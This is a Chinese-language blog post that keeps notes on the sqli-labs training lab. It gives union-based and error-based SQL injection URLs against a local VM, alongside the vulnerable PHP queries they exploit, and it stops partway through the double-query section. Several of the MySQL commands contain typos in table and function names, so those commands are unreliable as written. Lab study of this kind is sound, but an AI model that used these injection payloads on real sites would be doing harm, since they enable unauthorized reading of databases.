QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

Sqli-labs 学习(长期更新)

14 Feb 2019 » security

[TOC]

Less - 1 (GET字符型注入)

http://10.211.55.7/web/sqli-labs/Less-1/index.php?id=2' order by 3 -- s

http://10.211.55.7/web/sqli-labs/Less-1/index.php?id=-2' union select 1,2,database()-- s

# index.php 源代码
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Less - 2 (GET数字型注入)

http://10.211.55.7/web/sqli-labs/Less-2/index.php?id=2 order by 3 -- s

http://10.211.55.7/web/sqli-labs/Less-2/index.php?id=-2 union select 1,2,database()-- s

# index.php 源代码
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

Less - 3 (单引号变形-字符型注入)

http://10.211.55.7/web/sqli-labs/Less-3/index.php?id=1%27) order by 3--%20s

http://10.211.55.7/web/sqli-labs/Less-3/index.php?id=-1%27) union select 1,2,database()-- s

# index.php 源代码
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

Less - 4 (基于错误-双引号-字符型)

http://10.211.55.7/web/sqli-labs/Less-4/index.php?id=1") order by 3-- s

http://10.211.55.7/web/sqli-labs/Less-4/index.php?id=-1") union select 1,2,database()-- s

# inex.php 源代码
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=(”$id“) LIMIT 0,1";

Less - 6 (双注入-双引号-字符型)

SQL 基础

mysql>select count(*) from information_scheam.tables;

count()  // 返回行数

count

mysql>select rand();

rand() // 返回一个介于0和1之间的随机数

rand()

mysql>select table_name,table_schema from information_schema.tables group by table_schema;

group by // 按照规则对结果进行排序,我们看到输出结果以 table_schema 的首字符排序,输出每个数据库里的第一个表。

group_by

#  显示的是当前的数据库
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,0x3a)

group_concat

# 我们可以给 group_concat(0x3a,0x3a,(select database()),0x3a,0x3a) 取一个短一点的名字 
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,0x3a)name;

name

# 现在我们加入一些随机性,
mysql>select group_concat(0x3a,0x3a,(select database()),0x3a,floor(rand()))name;

rand()    // 获取随机数
floor()   // 取整

floor

# 这条语句可以看到当前数据库有多少字段数
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()))name from information_schema.columns;

information_schema.columns

# 这条语句可以看到当前数据库存在的表数
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()))name from informaiton_schema.tables;

information_schema.tables

# 接下来我们多加一个聚合函数 count()
mysql>select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,cloor(rand()*2))name from inforation_schema.tables group by name;